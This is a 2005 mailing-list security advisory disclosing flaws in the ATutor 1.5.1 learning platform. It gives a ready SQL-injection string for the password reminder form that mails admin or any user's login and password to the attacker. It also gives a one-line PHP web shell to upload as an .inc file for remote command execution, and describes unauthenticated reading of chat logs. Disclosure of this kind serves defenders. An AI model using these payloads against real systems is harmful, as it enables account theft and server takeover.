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ATutor 1.5.1 SQL Injection / Admin credentials disclosure / remote code execution
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: ATutor 1.5.1 SQL Injection / Admin credentials disclosure / remote code execution
- From: retrogod@xxxxxxxxxxxxx
- Date: 14 Sep 2005 09:52:22 -0000
ATUTOR 1.5.1 (possibly prior versions)
site: http://www.atutor.ca/
description: "ATutor is an Open Source Web-based Learning Content Management
System (LCMS) designed with
accessibility and adaptability in mind. Administrators can install or update
ATutor in minutes, and
develop custom templates to give ATutor a new look. Educators can quickly
assemble, package, and redistribute
Web-based instructional content, easily retrieve and import prepackaged
content, and conduct their courses online.
Students learn in an adaptive learning environment."
a) if magic_quotes_gpc is off in php.ini - > SQL INJECTION
without to have an user account, you can use password remider to send
yourself admin
login & password, no need for exploit code:
go to http://[target]/[path]/password_reminder.php
and in the email field type:
' UNION SELECT login, password, 'your_email@xxxxxxxxxx' FROM AT_admins /*
look at the vulnerable code in password_reminder.php:
$sql="SELECT login, password, email FROM ".TABLE_PREFIX."members WHERE
$result = mysql_query($sql,$db);
if ($row = mysql_fetch_assoc($result)) {
$r_login = $row['login'];
$r_passwd= $row['password'];
$r_email = $row['email'];
$tmp_message = _AT(array('password_request2',$_base_href))."\n\n";
$tmp_message .= _AT('web_site').' : '.$_base_href."\n";
$tmp_message .= _AT('login_name').' : '.$r_login."\n";
$tmp_message .= _AT('password').' : '.$r_passwd."\n";
require(AT_INCLUDE_PATH . 'classes/phpmailer/atutormailer.class.php');
$mail = new ATutorMailer;
$mail->From = EMAIL;
$mail->Subject = SITE_NAME . ': ' . _AT('password_reminder');
$mail->Body = $tmp_message;
if(!$mail->Send()) {
//echo 'There was an error sending the message';
$_POST[form_email] is not filtered in any way as you can see, so the query
SELECT login, password, email FROM AT_members WHERE email='' UNION SELECT
login, password, 'your_email@xxxxxxxxxx' FROM AT_admins /*'
/* are the Mysql comment chars so this is a valid query
$r_login and $r_passord are admin user & passord but $r_email is yours! ;)
also, you can have the password of any user typing:
' UNION SELECT login, password, 'your_email@xxxxxxxxxx' FROM AT_members
where login='user_whom_you_want_the_password' /*
if you want to see if your course server is vulnerable just type ' in email
field, you will have an error like this:
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result
resource in
[pathto]/password_reminder.php on line 27
if not, you will see a message like this:
The following errors occurred:
* No account found with that email address.
b) after you have your stealed admin or educator account (yes, an educator can
upload xecutable files :) )
you can execute arbitrary commands on target system uploading an .inc file
(this extension is not checked)
with php code inside, example:
<?php error_reporting(0); system($HTTP_GET_VARS[cmd]; ?>
then you can launch commands, example:
(usually upload dir is 'content' if admin do not change it, and subdir is
numbered by the time registration
of user, you can quickly bruteforce the url manually)
look at the list of illegal extensions in config.inc.php:
/* Illegal file types, by extension. Include any extensions */
/* you do not want to allow for uploading. (Just the extention */
/* without the leading dot.) */
$IllegalExtentions =
but where are .inc, .php4, .phtml, .html, .pwml and so on if you do not set?
should be better to setup which kind of files you CAN upload...
c) without have an account a user can read chat conversation without to be
logged in, making GET requests for
chat temporary files:
ciclyng this GET requests a user can dump all chat archive
site: http://rgod.altervista.org
mail: retrogod [at] aliceposta.it
original advisory: http://rgod.altervista.org/atutor151.html